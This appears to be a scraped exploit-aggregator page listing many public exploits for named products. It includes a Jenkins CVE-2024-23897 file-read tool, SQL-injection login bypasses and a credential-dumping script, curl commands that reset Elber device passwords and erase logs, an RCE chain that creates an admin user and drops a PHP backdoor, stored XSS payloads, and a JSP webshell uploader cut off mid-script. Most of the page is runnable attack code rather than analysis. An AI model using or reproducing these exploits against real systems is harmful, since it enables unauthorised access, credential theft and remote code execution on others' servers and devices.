# Exploit Title: Online Fire Reporting System SQL Injection Authentication Bypass # Date: 02/10/2024 # Exploit Author: Diyar Saadi # Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip # Version: V 1.2 # Tested on: Windows 11 + XAMPP 8.0.30 ## Exploit Description ## SQL Injection Vulnerability in ofrs/admin/index.php : The SQL injection vulnerability in the ofrs/admin/index.php script arises from insecure handling of user input during the login process. ## Steps to reproduce ## 1- Open the admin panel page by following URL : http://localhost/ofrs/admin/index.php 2- Enter the following payload from username-box : admin'or'1-- 3- Press Login button or press Enter . ## Proof Of Concept [1] ## POST /ofrs/admin/index.php HTTP/1.1 Host: localhost Content-Length: 46 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/ofrs/admin/index.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=fmnj70mh1qo2ssv80mlsv50o29 Connection: close username=admin%27or%27--&inputpwd=&login=login ## Proof Of Concept [ Python Based Script ] [2] ## import os import requests from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC import pyautogui banner = """ ░█████╗░███████╗██████╗░░██████╗  ░█████╗░███╗░░░███╗░██████╗ ██╔══██╗██╔════╝██╔══██╗██╔════╝  ██╔══██╗████╗░████║██╔════╝ ██║░░██║█████╗░░██████╔╝╚█████╗░  ██║░░╚═╝██╔████╔██║╚█████╗░ ██║░░██║██╔══╝░░██╔══██╗░╚═══██╗  ██║░░██╗██║╚██╔╝██║░╚═══██╗ ╚█████╔╝██║░░░░░██║░░██║██████╔╝  ╚█████╔╝██║░╚═╝░██║██████╔╝ ░╚════╝░╚═╝░░░░░╚═╝░░╚═╝╚═════╝░  ░╚════╝░╚═╝░░░░░╚═╝╚═════╝░ # Code By : Diyar Saadi """ print(banner) payload_requests = input("Enter the payload: ") url_requests = "http://localhost/ofrs/admin/index.php" data = { 'username': payload_requests, 'password': 'password', 'login': 'Login' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'Custom-Header': 'Your-Custom-Value' } try: response = requests.post(url_requests, data=data, headers=headers, allow_redirects=False) if response.status_code == 302 and response.headers.get('Location') and 'dashboard.php' in response.headers['Location']: print("Requests version: Admin Panel Successfully Bypassed !") url_selenium = "http://localhost/ofrs/admin/index.php" chrome_driver_path = "C:\\Windows\\webdriver\\chromedriver.exe" chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("executable_path=" + chrome_driver_path) driver = webdriver.Chrome(options=chrome_options) driver.get(url_selenium) pyautogui.typewrite(payload_requests) pyautogui.press('tab') pyautogui.typewrite(payload_requests) pyautogui.press('enter') WebDriverWait(driver, 10).until(EC.url_contains("dashboard.php")) screenshot_path = os.path.join(os.getcwd(), "dashboard_screenshot.png") driver.save_screenshot(screenshot_path) print(f"Selenium version: Screenshot saved as {screenshot_path}") driver.quit() else: print("Requests version: Login failed.") except Exception as e: print(f"An error occurred: {e}")
HireHackking

Stock Management System v1.0 - Unauthenticated SQL Injection

HACKER · %s · %s

# Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection # Date: February 6, 2024 # Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group # Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip # Tested on: Linux and Windows, XAMPP # CVE-2023-51951 # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack. import requests from bs4 import BeautifulSoup import argparse def print_header(): print("\033[1m\nStock Management System v1.0\033[0m") print("\033[1mSQL Injection Exploit\033[0m") print("\033[96mby blu3ming\n\033[0m") def parse_response(target_url): try: target_response = requests.get(target_url) soup = BeautifulSoup(target_response.text, 'html.parser') textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text # Split the text using ',' as a delimiter users = textarea_text.split(',') for user in users: # Split username and password using ':' as a delimiter username, password = user.split(':') print("| {:<20} | {:<40} |".format(username, password)) except: print("No data could be retrieved. Try again.") def retrieve_data(base_url): target_path = '/sms/admin/?page=purchase_order/manage_po&id=' payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-" #Dump users table target_url = base_url + target_path + payload print("+----------------------+------------------------------------------+") print("| {:<20} | {:<40} |".format("username", "password")) print("+----------------------+------------------------------------------+") parse_response(target_url) print("+----------------------+------------------------------------------+\n") if __name__ == "__main__": about = 'Unauthenticated SQL Injection Exploit - Stock Management System' parser = argparse.ArgumentParser(description=about) parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL') args = parser.parse_args() print_header() retrieve_data(args.base_url)
HireHackking

Jenkins 2.441 - Local File Inclusion

HACKER · %s · %s

# Exploit Title: Jenkins 2.441 - Local File Inclusion # Date: 14/04/2024 # Exploit Author: Matisse Beckandt (Backendt) # Vendor Homepage: https://www.jenkins.io/ # Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip # Version: 2.441 # Tested on: Debian 12 (Bookworm) # CVE: CVE-2024-23897 from argparse import ArgumentParser from requests import Session, post, exceptions from threading import Thread from uuid import uuid4 from time import sleep from re import findall class Exploit(Thread): def __init__(self, url: str, identifier: str): Thread.__init__(self) self.daemon = True self.url = url self.params = {"remoting": "false"} self.identifier = identifier self.stop_thread = False self.listen = False def run(self): while not self.stop_thread: if self.listen: self.listen_and_print() def stop(self): self.stop_thread = True def receive_next_message(self): self.listen = True def wait_for_message(self): while self.listen: sleep(0.5) def print_formatted_output(self, output: str): if "ERROR: No such file" in output: print("File not found.") elif "ERROR: Failed to parse" in output: print("Could not read file.") expression = "No such agent \"(.*)\" exists." results = findall(expression, output) print("\n".join(results)) def listen_and_print(self): session = Session() headers = {"Side": "download", "Session": self.identifier} try: response = session.post(self.url, params=self.params, headers=headers) except (exceptions.ConnectTimeout, exceptions.ConnectionError): print("Could not connect to target to setup the listener.") exit(1) self.print_formatted_output(response.text) self.listen = False def send_file_request(self, filepath: str): headers = {"Side": "upload", "Session": self.identifier} payload = get_payload(filepath) try: post(self.url, data=payload, params=self.params, headers=headers, timeout=4) except (exceptions.ConnectTimeout, exceptions.ConnectionError): print("Could not connect to the target to send the request.") exit(1) def read_file(self, filepath: str): self.receive_next_message() sleep(0.1) self.send_file_request(filepath) self.wait_for_message() def get_payload_message(operation_index: int, text: str) -> bytes: text_bytes = bytes(text, "utf-8") text_size = len(text_bytes) text_message = text_size.to_bytes(2) + text_bytes message_size = len(text_message) payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message return payload def get_payload(filepath: str) -> bytes: arg_operation = 0 start_operation = 3 command = get_payload_message(arg_operation, "connect-node") poisoned_argument = get_payload_message(arg_operation, f"@{filepath}") payload = command + poisoned_argument + start_operation.to_bytes(1) return payload def start_interactive_file_read(exploit: Exploit): print("Press Ctrl+C to exit") while True: filepath = input("File to download:\n> ") filepath = make_path_absolute(filepath) exploit.receive_next_message() try: exploit.read_file(filepath) except exceptions.ReadTimeout: print("Payload request timed out.") def make_path_absolute(filepath: str) -> str: if not filepath.startswith('/'): return f"/proc/self/cwd/{filepath}" return filepath def format_target_url(url: str) -> str: if url.endswith('/'): url = url[:-1] return f"{url}/cli" def get_arguments(): parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897") parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/") parser.add_argument("-p", "--path", help="The absolute path of the file to download") return parser.parse_args() def main(): args = get_arguments() url = format_target_url(args.url) filepath = args.path identifier = str(uuid4()) exploit = Exploit(url, identifier) exploit.start() if filepath: filepath = make_path_absolute(filepath) exploit.read_file(filepath) exploit.stop() return try: start_interactive_file_read(exploit) except KeyboardInterrupt: pass print("\nQuitting") exploit.stop() if __name__ == "__main__": main()
HireHackking
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.0.0 Revision 7304 1.0.0 Revision 7284 1.0.0 Revision 6505 1.0.0 Revision 6332 1.0.0 Revision 6258 XS2DAB v1.50 rev 6267 Summary: Cleber offers a powerful, flexible and modular hardware and software platform for broadcasting and contribution networks where customers can install up to six boards with no limitations in terms of position or number. Based on a Linux embedded OS, it detects the presence of the boards and shows the related control interface to the user, either through web GUI and Touchscreen TFT display. Power supply can be single (AC and/or DC) or dual (hot swappable for redundancy); customer may chose between two ranges for DC sources, that is 22-65 or 10-36 Vdc for site or DSNG applications. Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. -------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5816 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5816.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd)
HireHackking

Clinic Queuing System 1.0 - RCE

HACKER · %s · %s

# Exploit Title: Clinic Queuing System 1.0 RCE # Date: 2024/1/7 # Exploit Author: Juan Marco Sanchez # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html # Version: 1.0 # Tested on: Debian Linux Apache Web Server # CVE: CVE-2024-0264 and CVE-2024-0265 import requests import random import argparse from bs4 import BeautifulSoup parser = argparse.ArgumentParser() parser.add_argument("target") args = parser.parse_args() base_url = args.target phase1_url = base_url + '/LoginRegistration.php?a=save_user' phase2_url = base_url + '/LoginRegistration.php?a=login' filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home" def phase1(): # CVE-2024-0264 rand_user = 'pwn_'+str(random.randint(100, 313)) rand_pass = 'pwn_'+str(random.randint(100, 313)) pwn_user_data = {'formToken':'','fullname':'pwn!','username':rand_user,'password':rand_pass,'status':1,'type':1} print("[*] adding administrator " + rand_user + ":" + rand_pass) phase1 = requests.post(phase1_url, pwn_user_data) if "User Account has been added successfully." in phase1.text: print("[+] Phase 1 Success - Admin user added!\n") print("[*] Initiating Phase 2") phase2(rand_user, rand_pass) else: print("[X] user creation failed :(") die() def phase2(user, password): # CVE-2024-0265 s = requests.Session(); login_data = {'formToken':'','username':user, 'password':password} print("[*] Loggin in....") phase2 = s.post(phase2_url, login_data) if "Login successfully." in phase2.text: print("[+] Login success") else: print("[X] Login failed.") die() print("[+] Preparing for RCE via LFI PHP FIlter Chaining...\n") rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|<pre>'.shell_exec('id').'</pre>';" #print("[*] Payload: " + rce_url) rce = s.get(rce_url) if "jmrcsnchz" in rce.text: print("[+] RCE success!") soup = BeautifulSoup(rce.text, 'html.parser') print("[+] Output of id: " + soup.pre.get_text()) print("[*] Uploading php backdoor....") s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));") print("[+] Access at " + base_url + "/rce.php?0=whoami") else: print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.") die() try: print("[*] Initiating Phase 1") phase1() except: print("Exploit failed.")
HireHackking
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 0.01 Revision 0 Summary: The REBLE610 features an accurate hardware design, absence of internal cabling and full modularity. The unit is composed by a basic chassis with 4 extractable boards which makes maintenance and critical operations, like frequency modification, easy and efficient. The modular approach has brought to the development of the digital processing module (containing modulator, demodulator and data interface) and the RF module (containing Transmitter, Receiver and channel filters). From an RF point of view, the new transmission circuitry is able to guarantee around 1 Watt with every modulation scheme, introducing, in addition, wideband precorrection (up to 1GHz depending on frequency band). Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5819 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5819.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc.
HireHackking

Apache mod_proxy_cluster 1.2.6 - Stored XSS

HACKER · %s · %s

import requests import argparse from bs4 import BeautifulSoup from urllib.parse import urlparse, parse_qs, urlencode, urlunparse from requests.exceptions import RequestException class Colors: RED = '\033[91m' GREEN = '\033[1;49;92m' RESET = '\033[0m' def get_cluster_manager_url(base_url, path): print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET) try: response = requests.get(base_url + path) response.raise_for_status() except requests.exceptions.RequestException as e: print(Colors.RED + f"Error: {e}" + Colors.RESET) return None print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET) if response.status_code == 200: print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET) # Use BeautifulSoup to parse the HTML content soup = BeautifulSoup(response.text, 'html.parser') # Find all 'a' tags with 'href' attribute all_links = soup.find_all('a', href=True) # Search for the link containing the Alias parameter in the href attribute cluster_manager_url = None for link in all_links: parsed_url = urlparse(link['href']) query_params = parse_qs(parsed_url.query) alias_value = query_params.get('Alias', [None])[0] if alias_value: print(Colors.GREEN + f"Alias value found" + Colors.RESET) cluster_manager_url = link['href'] break if cluster_manager_url: print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET) return cluster_manager_url else: print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET) return None print(Colors.RED + f"Error: Unable to get the initial step on {base_url}") return None def update_alias_value(url): parsed_url = urlparse(url) query_params = parse_qs(parsed_url.query, keep_blank_values=True) query_params['Alias'] = ["<DedSec-47>"] updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True))) print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET) return updated_url def check_response_for_value(url, check_value): response = requests.get(url) if check_value in response.text: print(Colors.RED + "Website is vulnerable POC by :") print(Colors.GREEN + """ ____ _ ____ _ _ _____ | _ \ ___ __| / ___| ___ ___ | || |___ | | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / / | |_| | __/ (_| |___) | __/ (_ |____|__ | / / |____/ \___|\__,_|____/ \___|\___| |_|/_/ github.com/DedSec-47 """) else: print(Colors.GREEN + "Website is not vulnerable POC by :") print(Colors.GREEN + """ ____ _ ____ _ _ _____ | _ \ ___ __| / ___| ___ ___ | || |___ | | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / / | |_| | __/ (_| |___) | __/ (_ |____|__ | / / |____/ \___|\__,_|____/ \___|\___| |_|/_/ github.com/DedSec-47 """) def main(): # Create a command-line argument parser parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager") # Add a command-line argument for the target (-t/--target) parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True) # Add a command-line argument for the URL path (-u/--url) parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True) # Parse the command-line arguments args = parser.parse_args() # Get the cluster manager URL from the specified website cluster_manager_url = get_cluster_manager_url(args.target, args.url) # Check if the cluster manager URL is found if cluster_manager_url: # Modify the URL by adding the cluster manager value modified_url = args.target + cluster_manager_url modified_url = update_alias_value(args.target + cluster_manager_url) print(Colors.GREEN + "Check executed successfully" + Colors.RESET) # Check the response for the value "<DedSec-47>" check_response_for_value(modified_url, "<DedSec-47>") if __name__ == "__main__": main()
HireHackking

Plantronics Hub 3.25.1 - Arbitrary File Read

HACKER · %s · %s

# Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read # Date: 2024-05-10 # Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from Mastercard # Vendor Homepage: https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895 # Version: Plantronics Hub for Windows version 3.25.1 # Tested on: Windows 10/11 # CVE : CVE-2024-27460 As a regular user drop a file called "MajorUpgrade.config" inside the "C:\ProgramData\Plantronics\Spokes3G" directory. The content of MajorUpgrade.config should look like the following one liner: ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config Exchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy (any file on the system). The desired file will be copied into C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp Steps to reproduce (POC): - Open cmd.exe - Navigate using cd C:\ProgramData\Plantronics\Spokes3G - echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config - Desired file will be copied into C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp
HireHackking

CE Phoenix Version 1.0.8.20 - Stored XSS

HACKER · %s · %s

# Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS # Date: 2023-11-25 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://phoenixcart.org/ # Version: v3.0.1 # Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix ## POC: 1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php 2-Click edit and write in Title field your payload : <sVg/onLy=1 onLoaD=confirm(1)// 3-Save it and go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php 4-You will be see alert button
HireHackking

PyroCMS v3.0.1 - Stored XSS

HACKER · %s · %s

# Exploit Title: PyroCMS v3.0.1 - Stored XSS # Date: 2023-11-25 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://pyrocms.com/ # Version: v3.0.1 # Tested on: https://www.softaculous.com/apps/cms/PyroCMS ---------------------------------------------------------------------------------------------------- 1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/1 2-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)// 3-Save it and go to this url : https://127.0.0.1/public/admin/redirects 4-You will be see alert button
HireHackking

Savsoft Quiz v6.0 Enterprise - Stored XSS

HACKER · %s · %s

# Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting # Date: 2024-01-03 # Exploit Author: Eren Sen # Vendor: SAVSOFT QUIZ # Vendor Homepage: https://savsoftquiz.com # Software Link: https://savsoftquiz.com/web/index.php/online-demo/ # Version: < 6.0 # CVE-ID: N/A # Tested on: Kali Linux / Windows 10 # Vulnerabilities Discovered Date : 2024/01/03 # Persistent Cross Site Scripting (XSS) Vulnerability # Vulnerable Parameter Type: POST # Vulnerable Parameter: quiz_name # Proof of Concepts: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13 # HTTP Request: POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1 Host: demos1.softaculous.com Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx Content-Length: 411 Cache-Control: max-age=0 Sec-Ch-Ua: Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "" Upgrade-Insecure-Requests: 1 Origin: https://demos1.softaculous.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=
HireHackking

BMC Compuware iStrobe Web - 20.13 - Pre-auth RCE

HACKER · %s · %s

#!/usr/bin/env python3 # Exploit Title: Pre-auth RCE on Compuware iStrobe Web # Date: 01-08-2023 # Exploit Author: trancap # Vendor Homepage: https://www.bmc.com/ # Version: BMC Compuware iStrobe Web - 20.13 # Tested on: zOS# CVE : CVE-2023-40304 # To exploit this vulnerability you'll need "Guest access" enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files) # The vulnerable parameter of the form is "fileName". Using the form, one can upload a webshell (content of the webshell in the "topicText" parameter).# I contacted the vendor but he didn't consider this a vulnerability because of the Guest access needed. import requests import urllib.parse import argparse import sys def upload_web_shell(url): data = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"open","topicText":"<%@ page import=\"java.lang.*,java.io.*,java.util.*\" %><%Process p=Runtime.getRuntime().exec(request.getParameter(\"cmd\"));BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));String s=\"\";while((s=stdInput.readLine()) != null){out.println(s);};s=\"\";while((s=stdError.readLine()) != null){out.println(s);};%>","lang":"en","type":"MODULE","status":"PUB"} # If encoded, the web shell will not be uploaded properly data = urllib.parse.urlencode(data, safe='"*<>,=()/;{}!') # Checking if web shell already uploaded r = 